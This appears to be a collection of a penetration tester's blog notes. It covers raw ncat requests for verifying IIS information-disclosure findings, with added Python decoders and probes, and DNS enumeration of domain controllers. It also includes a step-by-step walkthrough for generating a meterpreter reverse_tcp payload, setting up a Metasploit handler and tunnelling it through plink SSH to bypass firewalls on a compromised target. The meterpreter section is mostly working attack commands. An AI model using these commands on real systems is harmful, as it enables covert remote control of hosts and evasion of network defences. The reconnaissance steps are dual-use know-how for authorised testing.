Quick notes – How to Verify IIS Findings

06/03/2012

How to verify IIS findings (requirement: ncat, which ships with the Nmap tool):

Microsoft IIS Authentication Method Disclosure

Verifying HTTPS (for plain HTTP just remove "--ssl" from the ncat command below)

# ncat --ssl -vv ip.address port
GET / HTTP/1.1
Host: iis-server
Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA=

OR

GET / HTTP/1.1
Host: iis-server
Authorization: Basic cTFraTk6ZDA5a2xt

---> RESPONSE:
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Sun, 03 Jun 2012 15:36:28 GMT
WWW-Authenticate: Negotiate TlRMTVNTUAACAAAAGgAaADgAAAAFgoKiSm+zVQ+ZeUsAAAAAAAAAAHwAfABSAAAABQCTCAAAAA9NAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAIAGgBNAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAEAGgBNAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAQAGgBtAGsAcwAtAG4AbwB0AC0AdwBlAGIAMAAxAAMAGgBtAGsAcwAtAG4AbwB0AC0AdwBlAGIAMAAxAAAAAAA=
Content-Length: 24
Content-Type: text/html

References:
Nexpose
CVE
BID
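The "Negotiate" challenge in the 401 above is an NTLM type 2 message, and the finding is about what it carries: the server's NetBIOS and DNS names and, when the version flag is set, the OS version. Here is an added decoder (not part of the original notes; written against the MS-NLMP layout) that turns the base64 token into those fields, so a tester can show exactly what is disclosed and a server owner can confirm the fix by re-running it after the change. It goes beyond the one capture on the page: it walks the whole AV_PAIR list, including the timestamp pair newer servers add. The blob below is the one captured in the notes above.

```python
import base64
import struct

# AV_PAIR ids and negotiate flags from MS-NLMP (subset relevant to this finding).
AV_NAMES = {
    1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName",
    5: "MsvAvDnsTreeName", 7: "MsvAvTimestamp",
}
FLAG_NAMES = {
    0x00000001: "NTLMSSP_NEGOTIATE_UNICODE",
    0x00000200: "NTLMSSP_NEGOTIATE_NTLM",
    0x00010000: "NTLMSSP_TARGET_TYPE_DOMAIN",
    0x00020000: "NTLMSSP_TARGET_TYPE_SERVER",
    0x00080000: "NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY",
    0x00800000: "NTLMSSP_NEGOTIATE_TARGET_INFO",
    0x02000000: "NTLMSSP_NEGOTIATE_VERSION",
    0x20000000: "NTLMSSP_NEGOTIATE_128",
    0x80000000: "NTLMSSP_NEGOTIATE_56",
}

# The WWW-Authenticate: Negotiate token returned by the IIS 5.0 server in the notes above.
SAMPLE_CHALLENGE = "TlRMTVNTUAACAAAAGgAaADgAAAAFgoKiSm+zVQ+ZeUsAAAAAAAAAAHwAfABSAAAABQCTCAAAAA9NAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAIAGgBNAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAEAGgBNAEsAUwAtAE4ATwBUAC0AVwBFAEIAMAAxAAQAGgBtAGsAcwAtAG4AbwB0AC0AdwBlAGIAMAAxAAMAGgBtAGsAcwAtAG4AbwB0AC0AdwBlAGIAMAAxAAAAAAA="


def _utf16(data, off, length):
    return data[off:off + length].decode("utf-16-le")


def decode_ntlm_challenge(token_b64):
    """Decode a base64 NTLM CHALLENGE_MESSAGE (type 2) into the fields it discloses."""
    data = base64.b64decode(token_b64)
    if data[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", data, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _tn_max, tn_off = struct.unpack_from("<HHI", data, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", data, 20)[0]                    # NegotiateFlags
    challenge = data[24:32]                                          # ServerChallenge
    ti_len, _ti_max, ti_off = struct.unpack_from("<HHI", data, 40)   # TargetInfoFields
    result = {
        "target_name": _utf16(data, tn_off, tn_len),
        "flags": flags,
        "flag_names": [name for bit, name in FLAG_NAMES.items() if flags & bit],
        "server_challenge": challenge.hex(),
        "target_info": {},
    }
    if flags & 0x02000000:  # the Version field is only present with NEGOTIATE_VERSION
        major, minor, build = struct.unpack_from("<BBH", data, 48)
        result["os_version"] = f"{major}.{minor} build {build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:  # AV_PAIR list: AvId, AvLen, value ... until MsvAvEOL
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:
            break
        value = data[pos:pos + av_len]
        pos += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id == 7:  # MsvAvTimestamp is a 64-bit FILETIME, not a string
            result["target_info"][name] = struct.unpack("<Q", value)[0]
        else:
            result["target_info"][name] = value.decode("utf-16-le")
    return result


def decode_www_authenticate(header_value):
    """Decode the value of a WWW-Authenticate header; None when it carries no NTLM token
    (a bare 'Negotiate' is the server asking the client to start, not a challenge)."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() not in ("negotiate", "ntlm") or not token.strip():
        return None
    return decode_ntlm_challenge(token.strip())


if __name__ == "__main__":
    for key, value in decode_www_authenticate("Negotiate " + SAMPLE_CHALLENGE).items():
        print(f"{key}: {value}")
```

Run against the capture above it reports the target name MKS-NOT-WEB01, the same name as NetBIOS and DNS computer and domain names (a standalone server), and OS version 5.0 build 2195, which is the Windows 2000 build behind the Microsoft-IIS/5.0 banner.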

Microsoft IIS Internal IP Address Leak

Verifying HTTPS (for plain HTTP just remove "--ssl" from the ncat command below)

#########################################
# Content-Location Internal IP Leak
#########################################

ncat --ssl -vv ip.address port
HEAD / HTTP/1.0

OR

ncat --ssl -vv ip.address port
GET / HTTP/1.0

#########################################
# WEBDAV PROPFIND/SEARCH Internal IP Leak
#########################################

ncat --ssl -vv ip.address port
PROPFIND / HTTP/1.1
Host:
Content-Length: 0

References:
Nexpose
BID

Microsoft IIS ISAPI Services are Enabled

Verifying HTTPS (for plain HTTP just remove "--ssl" from the ncat command below)


#########################################
# Test for the following extensions (IDA, 
# IDC, IDQ, HTR, HTW, and PRINTER)
#########################################
ncat --ssl -vv ip.address port
GET /x.printer HTTP/1.0

---> RESPONSE:
HTTP/1.1 500 13
Server: Microsoft-IIS/5.0
Date: Sun, 03 Jun 2012 16:02:30 GMT
X-Powered-By: ASP.NET
Content-Type: text/html
<b>Error in web printer install.</b>

References:
Nexpose

Microsoft IIS Unprotected CNF Files Information Disclosure

Verifying HTTPS (for plain HTTP just remove "--ssl" from the ncat command below)


#########################################
# Test for the following files:
# access.cnf, svcacl.cnf, writeto.cnf, 
# service.cnf, botinfs.cnf, bots.cnf, 
# linkinfo.cnf and services.cnf
#########################################

ncat --ssl -vv ip.address port
GET /_vti_pvt/access.cnf HTTP/1.0

---> RESPONSE:
HTTP/1.1 200 OK
Content-Length: 121
Content-Type: text/plain
Last-Modified: Sat, 11 Mar 2006 07:59:56 GMT
Accept-Ranges: bytes
ETag: "fa6d53c9e144c61:2184"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 03 Jun 2012 16:07:16 GMT
Connection: close

vti_encoding:SR|utf8-nl
RealmName:exp-rom-web-01
PasswordDir:c:\\inetpub\\wwwroot\\_vti_pvt
InheritPermissions:false

References:

Nexpose
SecuritySpace
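The three findings above (Content-Location internal IP leak, ISAPI extensions mapped, readable _vti_pvt .cnf files) are all verified the same way: send one raw request and read the status line, headers and body. Here is an added Python version of those checks (not from the original notes or from any scanner) that separates the response evaluation from the networking, so the evaluation can be run offline against saved responses and the same code can confirm a fix afterwards. The sample responses are constructed to mirror the shapes shown above; the 192.168.10.5 address is made up, and the probe function assumes network access to a host you are authorised to test.

```python
import ipaddress
import re
import socket
import ssl

# Responses constructed to mirror the shapes shown in the notes above (not live captures).
SAMPLE_HEAD_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n"
    "Content-Location: http://192.168.10.5/Default.htm\r\n"
    "Content-Type: text/html\r\n\r\n"
)
SAMPLE_PRINTER_RESPONSE = (
    "HTTP/1.1 500 13\r\nServer: Microsoft-IIS/5.0\r\nX-Powered-By: ASP.NET\r\n"
    "Content-Type: text/html\r\n\r\n<b>Error in web printer install.</b>"
)
SAMPLE_CNF_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\nServer: Microsoft-IIS/6.0\r\n\r\n"
    "vti_encoding:SR|utf8-nl\r\nRealmName:exp-rom-web-01\r\n"
    "PasswordDir:c:\\\\inetpub\\\\wwwroot\\\\_vti_pvt\r\nInheritPermissions:false\r\n"
)

# Extensions and files listed in the notes above.
ISAPI_EXTENSIONS = ("ida", "idc", "idq", "htr", "htw", "printer")
CNF_FILES = ("access.cnf", "svcacl.cnf", "writeto.cnf", "service.cnf",
             "botinfs.cnf", "bots.cnf", "linkinfo.cnf", "services.cnf")


def parse_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def internal_ips_in_headers(headers):
    """Private (RFC 1918), loopback and link-local addresses found in any header value."""
    leaked = []
    for value in headers.values():
        for candidate in re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", value):
            try:
                ip = ipaddress.ip_address(candidate)
            except ValueError:
                continue
            if ip.is_private:
                leaked.append(str(ip))
    return leaked


def isapi_extension_mapped(raw):
    """An unmapped extension is a plain 404; anything else (the notes show '500 13' with
    'Error in web printer install' for .printer) means an ISAPI handler answered."""
    status, _, _ = parse_response(raw)
    return status != 404


def cnf_file_exposed(raw):
    """A readable FrontPage .cnf file answers 200 with its key:value body."""
    status, _, body = parse_response(raw)
    return status == 200 and ("vti_encoding" in body or "PasswordDir" in body)


def probe(host, port, request_line, use_ssl=True):
    """Send one raw HTTP/1.0 request the way the ncat commands above do and return the
    response text. Certificate checks are off because lab servers are usually self-signed."""
    sock = socket.create_connection((host, port), timeout=10)
    try:
        if use_ssl:
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            sock = ctx.wrap_socket(sock, server_hostname=host)
        sock.sendall((request_line + "\r\n\r\n").encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        sock.close()
    return b"".join(chunks).decode("latin-1")


def verify_iis(host, port, use_ssl=True):
    """Run the three checks against a live server and return what was confirmed."""
    _, headers, _ = parse_response(probe(host, port, "HEAD / HTTP/1.0", use_ssl))
    return {
        "internal_ips": internal_ips_in_headers(headers),
        "isapi_mapped": [e for e in ISAPI_EXTENSIONS
                         if isapi_extension_mapped(probe(host, port, f"GET /x.{e} HTTP/1.0", use_ssl))],
        "cnf_exposed": [f for f in CNF_FILES
                        if cnf_file_exposed(probe(host, port, f"GET /_vti_pvt/{f} HTTP/1.0", use_ssl))],
    }
```

The ISAPI check is a heuristic: it treats any non-404 answer as "an extension handler is mapped", which matches the 500 13 shown above but will also flag a generic 500 from an unrelated error, so read the body before reporting. For the CNF finding, an empty result for every file after the _vti_pvt directory has been removed or access to it denied is the evidence of the fix.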

Quick notes – Enumerate Domain Controllers via nslookup

12/16/2011

Scenario:

Let’s say you know the domain name but you would like to enumerate all domain controllers.

domain: hacking.lab.local

# Linux Backtrack 5 R1 (attacker machine) 

  1. Open your Linux shell

Using Nslookup

nslookup
set type=srv
_ldap._tcp.dc._msdcs.hacking.lab.local

Using dig (display a list of domain controllers)

dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local | egrep -v '(;;)'|cut -d" " -f8 | awk NF
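As an added example (not part of the original notes), a small Python parser over dig's text output that is sturdier than the cut pipeline above: it splits on any whitespace, keeps the SRV priority, weight and port, picks up the A records dig returns in the additional section, and sorts the way clients would pick a DC. The sample output below is constructed for the lab domain and the addresses in it are made up; query_domain_controllers assumes dig is installed. On the defensive side, a DC missing from this list has not registered its SRV record, which is the check the TechNet reference below describes.

```python
import subprocess

# Constructed sample of `dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local` output
# (fabricated records for the lab domain, not a real capture).
SAMPLE_DIG_OUTPUT = """\
; <<>> DiG 9.7.0 <<>> SRV _ldap._tcp.dc._msdcs.hacking.lab.local
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4242
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 2

;; QUESTION SECTION:
;_ldap._tcp.dc._msdcs.hacking.lab.local.\tIN\tSRV

;; ANSWER SECTION:
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t0 100 389 dc01.hacking.lab.local.
_ldap._tcp.dc._msdcs.hacking.lab.local.\t600\tIN\tSRV\t10 50 389 dc02.hacking.lab.local.

;; ADDITIONAL SECTION:
dc01.hacking.lab.local.\t3600\tIN\tA\t10.10.0.10
dc02.hacking.lab.local.\t3600\tIN\tA\t10.10.0.11

;; Query time: 1 msec
"""


def parse_dig_output(text):
    """Return (SRV records, A glue) from dig's text output, skipping ';' comment lines."""
    srv, glue = [], {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(";"):
            continue
        fields = line.split()  # dig separates columns with a mix of tabs and spaces
        if len(fields) >= 8 and fields[3] == "SRV":
            srv.append({
                "priority": int(fields[4]), "weight": int(fields[5]),
                "port": int(fields[6]), "target": fields[7].rstrip("."),
            })
        elif len(fields) >= 5 and fields[3] == "A":
            glue[fields[0].rstrip(".")] = fields[4]
    return srv, glue


def domain_controllers(text):
    """(hostname, port, address) for each DC, lowest priority first, heavier weight first."""
    srv, glue = parse_dig_output(text)
    srv.sort(key=lambda r: (r["priority"], -r["weight"]))
    return [(r["target"], r["port"], glue.get(r["target"])) for r in srv]


def query_domain_controllers(domain, dig="dig"):
    """Run dig for a real domain (assumes dig is on PATH; not exercised offline)."""
    name = f"_ldap._tcp.dc._msdcs.{domain}"
    out = subprocess.run([dig, "SRV", name], capture_output=True, text=True, check=True).stdout
    return domain_controllers(out)


if __name__ == "__main__":
    for host, port, addr in domain_controllers(SAMPLE_DIG_OUTPUT):
        print(f"{host}:{port} {addr or '(no glue record)'}")
```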

References:

Verify DNS registration for DC using nslookup: http://technet.microsoft.com/en-us/library/cc738991%28WS.10%29.aspx

Get Domain Admins Script (GDA.bat): https://github.com/nullbind/Other-Projects/tree/master/GDA

Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011

Scenario:

Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you upload your meterpreter payload and run it, the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload:
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msf.exe
  3. Drop msf.exe on your target
  4. Drop plink.exe on your target (the plink version from Quest PuTTY)
  5. Set up a msf handler:
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.1.1
set lport 4444
set exitonsession false
exploit -j
  • Note: Use 127.0.1.1 instead of 127.0.0.1 (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias 127.0.1.1

# Windows (target machine)

  1. Connect to the SSH server and set up the port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444
  2. Start msf.exe

You should get a meterpreter reverse shell.

References:

Resilient SSH Tunneled Meterpreter Session: http://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTY: http://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:

Reverse:


## attacker ##
# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.1.1 LPORT=4444 X > /path/msfrev.exe

## target ##

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -L 127.0.1.1:4444:127.0.1.1:4444

Bind:

## attacker ##

msfpayload windows/meterpreter/bind_tcp RHOST=127.0.1.1 LPORT=4444 X > /path/msfbind.exe

## target ##

plink.exe user@ip_of_my_ssh_server -pw mypass -P port -auto_store_key_in_cache -R 127.0.1.1:4444:127.0.1.1:4444

ready for the pain?

03/23/2011

Happy to announce my debut!

ping hdesser.wordpress.com
PING lb.wordpress.com (72.233.2.58): 56 data bytes
64 bytes from 72.233.2.58: icmp_seq=0 ttl=52 time=117.765 ms
64 bytes from 72.233.2.58: icmp_seq=1 ttl=52 time=122.476 ms
64 bytes from 72.233.2.58: icmp_seq=2 ttl=52 time=111.617 ms
64 bytes from 72.233.2.58: icmp_seq=3 ttl=52 time=110.627 ms
64 bytes from 72.233.2.58: icmp_seq=4 ttl=52 time=115.772 ms
64 bytes from 72.233.2.58: icmp_seq=5 ttl=52 time=138.754 ms
^C
--- lb.wordpress.com ping statistics ---
6 packets transmitted, 6 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 110.627/119.502/138.754/9.464 ms

Finally, I will have a place to vomit my ideas.

Before I begin, a few things you might need to know about me:

A proud offsec certified student (OSWP/OSCP/OSCE), Corelan’s student, and infosec enthusiast by heart.